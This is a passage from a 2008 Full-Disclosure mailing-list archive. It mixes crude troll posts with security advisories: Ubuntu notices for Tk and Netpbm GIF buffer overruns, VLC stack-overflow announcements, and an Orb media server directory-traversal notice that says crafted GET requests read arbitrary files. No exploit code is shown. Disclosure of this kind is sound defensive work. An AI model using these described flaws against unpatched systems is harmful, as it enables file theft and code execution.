Date: Fri, 7 Nov 2008 11:55:29 +0200
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <282134E75BDEB64E943CAF38C80BDD8AD3249A@PRO-EXCHANGESRV.experian.dk>
References: <20081107063354.78C1E2003F@smtp.hushmail.com>
	<282134E75BDEB64E943CAF38C80BDD8AD3249A@PRO-EXCHANGESRV.experian.dk>
Message-ID: <8a6b8e350811070155v3c45668cua146e0f2bfdfa8e2@mail.gmail.com>

I love waking up in the morning to read this! Ahh....

On Fri, Nov 7, 2008 at 10:39 AM, Anders Klixbull <akl at experian.dk> wrote:

> The hardcore cockgobbler scene of scotland
>
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Elazar
> Broad
> Sent: 7. november 2008 07:34
> To: full-disclosure at lists.grok.org.uk; xploitable at gmail.com
> Subject: Re: [Full-disclosure] Two bulletins from Microsoft on Patch
> Tuesday
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> What scene...
>
> On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <xploitable at gmail.com>
> wrote:
> >i've been monitoring the scene since 1999 so what do you mean no
> >experience? i make that about 10 years experience if my math is
> >correct.
> >
> >On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com>
> >wrote:
> >> Do you even understand why people dont like you? It is because
> >you have all
> >> these crackpot ideas but no experience to back it up. All your
> >ideas only
> >> make sense from a theoretical standpoint, but in practicality
> >most will
> >> fail.
> >>
> >> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com>
> >wrote:
> >>>
> >>> blackhats like you will always hate on me, so i just ignore the
> >>> negative responses i get.
> >>
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Charset: UTF8
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 3.0
>
> wpwEAQECAAYFAkkT4VIACgkQi04xwClgpZjqkQP/TCHzaFO3ngEhyXoJPlowTfzidJzg
> KyzTUAiLg4AKvqxXg+TSHiIkSDQWqCmzDr0qQ5OqywMgXmbWFNZzAdZuQtf5kW4KDBLx
> eclRU3VoqfSCcEMb6puLNQdnHudcVxxZk1dQQdBLlfddHRuX6sGllNkVVvtiaYPnK1U1
> QxmDKXU=
> =bW8c
> -----END PGP SIGNATURE-----
>
> --
> Click here to find old friends, lovers or family.
> http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvUL
> RkY7oBbDmctTq/<http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvULRkY7oBbDmctTq/>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/31a392f6/attachment.html 

From tom.ferris.sucks at gmail.com  Fri Nov  7 10:18:42 2008
From: tom.ferris.sucks at gmail.com (ferris sucks dicks)
Date: Fri, 7 Nov 2008 02:18:42 -0800
Subject: [Full-disclosure] tom ferris sucks balls
Message-ID: <22b776f10811070218u4baee580x8eb28967d808127@mail.gmail.com>

hey buddy heres another link in case the formattings fucked on the other 1

http://rapidshare.com/files/161452864/tf.txt.html
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/2ad28ba5/attachment.html 

From akl at experian.dk  Fri Nov  7 10:22:31 2008
From: akl at experian.dk (Anders Klixbull)
Date: Fri, 7 Nov 2008 11:22:31 +0100
Subject: [Full-disclosure] tom ferris sucks balls
In-Reply-To: <22b776f10811070218u4baee580x8eb28967d808127@mail.gmail.com>
References: <22b776f10811070218u4baee580x8eb28967d808127@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD3249B@PRO-EXCHANGESRV.experian.dk>

TEH TXT FIEL FORMATTING SI TEH FUCKED

________________________________

From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of ferris
sucks dicks
Sent: 7. november 2008 11:19
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] tom ferris sucks balls


hey buddy heres another link in case the formattings fucked on the other
1

http://rapidshare.com/files/161452864/tf.txt.html

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/4e39717b/attachment.html 

From anonymouspimp at gmail.com  Fri Nov  7 13:22:23 2008
From: anonymouspimp at gmail.com (anonymous pimp)
Date: Fri, 7 Nov 2008 15:22:23 +0200
Subject: [Full-disclosure] What Christianity means to me
In-Reply-To: <1865973b0811070023r11f4405fjabab2fb27928b392@mail.gmail.com>
References: <1865973b0811070023r11f4405fjabab2fb27928b392@mail.gmail.com>
Message-ID: <2d792fb20811070522u3324c170h27f52cd19b86ef4b@mail.gmail.com>

> And that, my friends, is the basis of all Christianity.

No it isn't.

"Christianity is... based on the teachings of Jesus Christ" [0]


[0] http://www.bbc.co.uk/religion/religions/christianity/

--
anonymouspimp



From marc.deslauriers at canonical.com  Thu Nov  6 18:45:26 2008
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 06 Nov 2008 13:45:26 -0500
Subject: [Full-disclosure] [USN-664-1] Tk vulnerability
Message-ID: <1225997126.9467.6.camel@mdlinux>

===========================================================
Ubuntu Security Notice USN-664-1          November 06, 2008
tk8.0, tk8.3, tk8.4 vulnerability
CVE-2008-0553
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  tk8.0                           8.0.5-11ubuntu0.1
  tk8.3                           8.3.5-4ubuntu1.2
  tk8.4                           8.4.12-0ubuntu1.2

Ubuntu 7.10:
  tk8.3                           8.3.5-6ubuntu3.1
  tk8.4                           8.4.15-1ubuntu1.1

Ubuntu 8.04 LTS:
  tk8.4                           8.4.16-2ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Tk could be made to overrun a buffer when loading
certain images. If a user were tricked into opening a specially crafted
GIF image, remote attackers could cause a denial of service or execute
arbitrary code with user privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.0/tk8.0_8.0.5-11ubuntu0.1.diff.gz
      Size/MD5:   455767 624a4aaeda503706d929f7d8f203a3e3
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.0/tk8.0_8.0.5-11ubuntu0.1.dsc
      Size/MD5:     1019 9f9fde8c98171c13cf504bb2c2bdde17
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.0/tk8.0_8.0.5.orig.tar.gz
      Size/MD5:  2033223 3ae92b86c01ec99a1872697294839e64
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-4ubuntu1.2.diff.gz
      Size/MD5:    28060 51b033f7ac63ec0dc35fb3ebcb50f418
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-4ubuntu1.2.dsc
      Size/MD5:     1023 49db61772bb838f83df230b214161907
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5.orig.tar.gz
      Size/MD5:  2598030 363a55d31d94e05159e9212074c68004
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.12-0ubuntu1.2.diff.gz
      Size/MD5:    21534 2e49f47d0df578cddbfb9775469d168b
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.12-0ubuntu1.2.dsc
      Size/MD5:     1083 a3ad94f647e37b3da2d3ea2274bb6f08
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.12.orig.tar.gz
      Size/MD5:  3245547 316491cb82d898b434842353aed1f0d6

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-doc_8.4.12-0ubuntu1.2_all.deb
      Size/MD5:   788200 01dc19de0b3d36acea0541622129a442
    http://security.ubuntu.com/ubuntu/pool/universe/t/tk8.0/tk8.0-doc_8.0.5-11ubuntu0.1_all.deb
      Size/MD5:   555110 8da51243a21a0d0e03c4bb5c33389e42
    http://security.ubuntu.com/ubuntu/pool/universe/t/tk8.3/tk8.3-doc_8.3.5-4ubuntu1.2_all.deb
      Size/MD5:   656938 24d91aed7f2612ac56b56bbf16a6b3a8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.0/tk8.0_8.0.5-11ubuntu0.1_amd64.deb
      Size/MD5:  1242594 9c6cb511fc3ec39fc4f338f616597307
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-dev_8.3.5-4ubuntu1.2_amd64.deb
      Size/MD5:   697568 d47ef6fa6c4269899d84273a3c502318
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-4ubuntu1.2_amd64.deb
      Size/MD5:  2919866 9851c5e98c5820edee0cb73134e4465f
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.12-0ubuntu1.2_amd64.deb
      Size/MD5:   846932 7203e3548032f5e126c3e04adddcd9bb
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.12-0ubuntu1.2_amd64.deb
      Size/MD5:  1012164 e8d1cc364274f2c92fff254bf0cf31ff
    http://security.ubuntu.com/ubuntu/pool/universe/t/tk8.0/tk8.0-dev_8.0.5-11ubuntu0.1_amd64.deb
      Size/MD5:   564798 d6aaa3faa675ae34f5517b9a800ec4e7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.0/tk8.0_8.0.5-11ubuntu0.1_i386.deb
      Size/MD5:  1112956 b27a3e79df915bff0aa557bdae8eac0d
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-dev_8.3.5-4ubuntu1.2_i386.deb
      Size/MD5:   648134 6747530f3380f84cbdc637e2c4ed3429
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-4ubuntu1.2_i386.deb
      Size/MD5:  2732568 5f1bc057480c20a0e66414b58a34ff58
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.12-0ubuntu1.2_i386.deb
      Size/MD5:   793148 229b89170088c480db48a32f92ff28ba
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.12-0ubuntu1.2_i386.deb
      Size/MD5:   956516 0f531a37707a2e5db21c050fbaf752bd
    http://security.ubuntu.com/ubuntu/pool/universe/t/tk8.0/tk8.0-dev_8.0.5-11ubuntu0.1_i386.deb
      Size/MD5:   521652 6c10e6945c334c1506dacc9970367d03

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.0/tk8.0_8.0.5-11ubuntu0.1_powerpc.deb
      Size/MD5:  1230088 02a5a6f0bc73b94fd4c16d31bc633109
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-dev_8.3.5-4ubuntu1.2_powerpc.deb
      Size/MD5:   660074 c89495d38a922de0f188199d47971dbc
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-4ubuntu1.2_powerpc.deb
      Size/MD5:  2932018 5e9388afbb35c561aff87c1ae83a322e
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.12-0ubuntu1.2_powerpc.deb
      Size/MD5:   806852 8d6a9dcacbf8725abf1f0beead19de65
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.12-0ubuntu1.2_powerpc.deb
      Size/MD5:   999658 c483c85e3736eccf66f597f2e3deea13
    http://security.ubuntu.com/ubuntu/pool/universe/t/tk8.0/tk8.0-dev_8.0.5-11ubuntu0.1_powerpc.deb
      Size/MD5:   533942 2b539c0f193b96518588ea1ba35d0cf6

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.0/tk8.0_8.0.5-11ubuntu0.1_sparc.deb
      Size/MD5:  1128404 dd01474892069952e4d23b7e46db81c8
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-dev_8.3.5-4ubuntu1.2_sparc.deb
      Size/MD5:   680266 2500c749b23b90a590d193f6687f4835
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-4ubuntu1.2_sparc.deb
      Size/MD5:  2792458 c8c5259f432014f64d0a3f91de2d1125
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.12-0ubuntu1.2_sparc.deb
      Size/MD5:   826916 ba6ab8fd313bd283accfc849e56b7d30
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.12-0ubuntu1.2_sparc.deb
      Size/MD5:   979172 0dc20a66a68b6b09227fa607ad9e9864
    http://security.ubuntu.com/ubuntu/pool/universe/t/tk8.0/tk8.0-dev_8.0.5-11ubuntu0.1_sparc.deb
      Size/MD5:   538652 3d27539675cdf3fbf2a05546321ad736

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-6ubuntu3.1.diff.gz
      Size/MD5:    28401 56ae8da9e13ba5c50b5383a87e518452
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-6ubuntu3.1.dsc
      Size/MD5:     1162 9377043998c247fea3cb21cb2e93a49c
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5.orig.tar.gz
      Size/MD5:  2598030 363a55d31d94e05159e9212074c68004
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.15-1ubuntu1.1.diff.gz
      Size/MD5:    11022 fabe1a67b27e694f25b384746589bbb8
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.15-1ubuntu1.1.dsc
      Size/MD5:     1277 09200463daf224b1f7ab29b95bb50a3a
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.15.orig.tar.gz
      Size/MD5:  3340313 68777568d818e1980dda4b6b02b92f1a

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-doc_8.3.5-6ubuntu3.1_all.deb
      Size/MD5:   657166 4713b2254c2467e6975c7a2fd2be4346
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-doc_8.4.15-1ubuntu1.1_all.deb
      Size/MD5:   806328 4e47f9174acbf2dd54a90b52991ec806

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-dev_8.3.5-6ubuntu3.1_amd64.deb
      Size/MD5:   697782 8d9f3c14931017633eef838c86b866e8
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-6ubuntu3.1_amd64.deb
      Size/MD5:   838492 2def3ba9f59eddd2c7a6dd4a4ed504b4
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.15-1ubuntu1.1_amd64.deb
      Size/MD5:   865754 539d4df4c8f30b21d8d3be213b9e2613
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.15-1ubuntu1.1_amd64.deb
      Size/MD5:  1036114 b7f8a3d7f278382d4208f69f22c292a1

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-dev_8.3.5-6ubuntu3.1_i386.deb
      Size/MD5:   672294 253fbc3e57601da574d4902318104e27
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-6ubuntu3.1_i386.deb
      Size/MD5:   809568 d14ddfa099c9e1d86e51c33ca4297a6b
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.15-1ubuntu1.1_i386.deb
      Size/MD5:   840150 45ae7d4de5e8307b43da6fed285e0f0f
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.15-1ubuntu1.1_i386.deb
      Size/MD5:  1002570 0feb06f1239d4dc3a09cecebb818df80

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/t/tk8.3/tk8.3-dev_8.3.5-6ubuntu3.1_lpia.deb
      Size/MD5:   664762 6b2c167a411b5bc6b51e897dbfc72d44
    http://ports.ubuntu.com/pool/main/t/tk8.3/tk8.3_8.3.5-6ubuntu3.1_lpia.deb
      Size/MD5:   809050 11fc7f117ba6f757a9cc3d4dabde6a61
    http://ports.ubuntu.com/pool/main/t/tk8.4/tk8.4-dev_8.4.15-1ubuntu1.1_lpia.deb
      Size/MD5:   832466 5aadc7ef038e680eeb50ff329578c7e7
    http://ports.ubuntu.com/pool/main/t/tk8.4/tk8.4_8.4.15-1ubuntu1.1_lpia.deb
      Size/MD5:  1002542 93e6840019c82592f4acdce31e7d8832

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-dev_8.3.5-6ubuntu3.1_powerpc.deb
      Size/MD5:   671038 7a7cc41b5cafa1a63d0e7c0c97a2e3e1
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-6ubuntu3.1_powerpc.deb
      Size/MD5:   844566 0fb95d839a8b8ed6244818c6217738fb
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.15-1ubuntu1.1_powerpc.deb
      Size/MD5:   841154 8405745783c484b3391101a6d238f2c4
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.15-1ubuntu1.1_powerpc.deb
      Size/MD5:  1042582 27069ff173a63b8c6e5b7755666ca238

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3-dev_8.3.5-6ubuntu3.1_sparc.deb
      Size/MD5:   686192 4b6bbb17d26c6f730457f847b6b086ca
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.3/tk8.3_8.3.5-6ubuntu3.1_sparc.deb
      Size/MD5:   814140 c662b08e362151a5b6168383c2558e6f
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.15-1ubuntu1.1_sparc.deb
      Size/MD5:   850358 6ef19660783562ad79980d834d22af7e
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.15-1ubuntu1.1_sparc.deb
      Size/MD5:  1009164 9cf16927296e3566146cab438e5bcf0c

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.16-2ubuntu1.1.diff.gz
      Size/MD5:    11255 fddfeb381414ae5ad3f1b666f0a3bbb3
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.16-2ubuntu1.1.dsc
      Size/MD5:     1343 2239977514a8b8b5a55a152264f8567b
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.16.orig.tar.gz
      Size/MD5:  3344618 24d18fbebe3bb8853e418431be01bf2c

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-doc_8.4.16-2ubuntu1.1_all.deb
      Size/MD5:   810520 ef5e83ada9997a86ea6c81d53dcc069a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.16-2ubuntu1.1_amd64.deb
      Size/MD5:   875806 d01319038e80337d979c4f0c1a425cb8
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.16-2ubuntu1.1_amd64.deb
      Size/MD5:  1041820 2c9caebfc0d4d920b34502f056aa928a

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4-dev_8.4.16-2ubuntu1.1_i386.deb
      Size/MD5:   843216 d6efa05e7cb077b59c8e4b37dadedde9
    http://security.ubuntu.com/ubuntu/pool/main/t/tk8.4/tk8.4_8.4.16-2ubuntu1.1_i386.deb
      Size/MD5:  1001132 c7d3727a22902bc4573fd7f685e1f381

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/t/tk8.4/tk8.4-dev_8.4.16-2ubuntu1.1_lpia.deb
      Size/MD5:   836000 f91f94686955b0b76362206336a96929
    http://ports.ubuntu.com/pool/main/t/tk8.4/tk8.4_8.4.16-2ubuntu1.1_lpia.deb
      Size/MD5:   999502 fdd407d2c354c3b61baffb84550af475

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/t/tk8.4/tk8.4-dev_8.4.16-2ubuntu1.1_powerpc.deb
      Size/MD5:   852414 119d5a95f72b3e21d7a49b5411be4cfa
    http://ports.ubuntu.com/pool/main/t/tk8.4/tk8.4_8.4.16-2ubuntu1.1_powerpc.deb
      Size/MD5:  1043522 d7c78251011f26489c28eb54bfabb699

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/t/tk8.4/tk8.4-dev_8.4.16-2ubuntu1.1_sparc.deb
      Size/MD5:   841910 d7123dbc22b32711a226e49c95db23dc
    http://ports.ubuntu.com/pool/main/t/tk8.4/tk8.4_8.4.16-2ubuntu1.1_sparc.deb
      Size/MD5:  1001600 fe343da05ac4e8e03e81ceb805e04dc2


-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/d3cd8818/attachment.bin 

From tk at trapkit.de  Thu Nov  6 18:38:55 2008
From: tk at trapkit.de (Tobias Klein)
Date: Thu, 06 Nov 2008 19:38:55 +0100
Subject: [Full-disclosure] [TKADV2008-011] VLC media player RealText
 Processing Stack Overflow Vulnerability
Message-ID: <491339BF.8000409@trapkit.de>

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-011.txt
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: TKADV2008-011.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/33b13b66/attachment.txt 

From tk at trapkit.de  Thu Nov  6 18:38:59 2008
From: tk at trapkit.de (Tobias Klein)
Date: Thu, 06 Nov 2008 19:38:59 +0100
Subject: [Full-disclosure] [TKADV2008-012] VLC media player cue Processing
	Stack Overflow Vulnerability
Message-ID: <491339C3.5060506@trapkit.de>

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-012.txt
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: TKADV2008-012.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/273a8c6d/attachment.txt 

From DDI.VulnerabilityAlert at ddifrontline.com  Thu Nov  6 19:59:22 2008
From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert)
Date: Thu, 6 Nov 2008 13:59:22 -0600
Subject: [Full-disclosure] DDIVRT-2008-17 Orb Directory Traversal
Message-ID: <2571D31D42513640AE1632FEE100E0E402DD7438@hypercom.defense.local>

Title

-----

DDIVRT-2008-17 Orb Directory Traversal

 

Severity

--------

High

 

Date Discovered

---------------

October, 21st 2008

 

Discovered By

-------------

Digital Defense, Inc. Vulnerability Research Team

Credit: Steven James and r at b13$

 

Vulnerability Description

-------------------------

Orb Networks' Orb media server is vulnerable to directory traversal
attacks.  Users can leverage specially crafted GET requests to read
arbitrary files. 

 

Solution Description

--------------------

Use firewall rules to restrict access to authorized users of the Orb
server.

This issue is fixed in version 2.01.0022 available at

      http://www.orb.com/download/us/setup_2.01.0022.exe
<http://www.orb.com/download/us/setup_2.01.0022.exe>  

 

Tested Systems / Software (with versions)

------------------------------------------

Orb version 2.01.0017 on Windows XP Pro SP2

Nullsoft Winamp Remote Server Beta (featuring Orb version 2.01.0013) on
Windows XP Pro SP2

 

Vendor Contact

--------------

Orb Networks

Website: http://www.orb.com

 

 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/8a2600ce/attachment.html 

From marc.deslauriers at canonical.com  Thu Nov  6 22:22:27 2008
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 06 Nov 2008 17:22:27 -0500
Subject: [Full-disclosure] [USN-665-1] Netpbm vulnerability
Message-ID: <1226010147.9467.7.camel@mdlinux>

===========================================================
Ubuntu Security Notice USN-665-1          November 06, 2008
netpbm-free vulnerability
CVE-2008-0554
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  netpbm                          2:10.0-10ubuntu1.1

Ubuntu 7.10:
  netpbm                          2:10.0-11ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Netpbm could be made to overrun a buffer when loading
certain images. If a user were tricked into opening a specially crafted
GIF image, remote attackers could cause a denial of service or execute
arbitrary code with user privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm-free_10.0-10ubuntu1.1.diff.gz
      Size/MD5:    47416 8c934de07a571397513476c437cabb2f
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm-free_10.0-10ubuntu1.1.dsc
      Size/MD5:     1177 8f3609a5895ebad9690b9775566598fe
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm-free_10.0.orig.tar.gz
      Size/MD5:  1926538 985e9f6d531ac0b2004f5cbebdeea87d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-10ubuntu1.1_amd64.deb
      Size/MD5:   117090 c98ea1eed4289c4c50a8506a059f1012
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10_10.0-10ubuntu1.1_amd64.deb
      Size/MD5:    67988 7c8c79e7157b4270e786689b70afebcc
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm_10.0-10ubuntu1.1_amd64.deb
      Size/MD5:  1240542 c83dcf0458f61476e3cbf8e3b973aae2
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-10ubuntu1.1_amd64.deb
      Size/MD5:   117554 0ade156c94cbd5f0c902720a17a36b91
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9_10.0-10ubuntu1.1_amd64.deb
      Size/MD5:    76128 76f13c6a58ee22b753513baea9ee9b4c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-10ubuntu1.1_i386.deb
      Size/MD5:   107600 61fac1e5c74250be84d52fd6725ab685
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10_10.0-10ubuntu1.1_i386.deb
      Size/MD5:    61830 da159f82fb4ee67a3a6c33d6e35042e9
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm_10.0-10ubuntu1.1_i386.deb
      Size/MD5:  1158566 6c9f3d48e61081bd08fdef781e66f3ef
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9-dev_10.0-10ubuntu1.1_i386.deb
      Size/MD5:   107768 6c9a5ffa2597bb4c140098ba6aee52f8
    http://security.ubuntu.com/ubuntu/pool/universe/n/netpbm-free/libnetpbm9_10.0-10ubuntu1.1_i386.deb
      Size/MD5:    68350 f294764496a8886ec136bb28d9d9fc14

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10-dev_10.0-10ubuntu1.1_powerpc.deb
      Size/MD5:   118684 74b6e583202c40ff700c34a8526364cb
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/libnetpbm10_10.0-10ubuntu1.1_powerpc.deb
      Size/MD5:    67920 1f5136910fa28a67c0f502da278e23c2
    http://security.ubuntu.com/ubuntu/pool/main/n/netpbm-free/netpbm_10.0-10ubuntu1.1_powerpc.deb
      Size/MD5:  1433978 584ef3d723e3a1be63d493c2b9fd7799
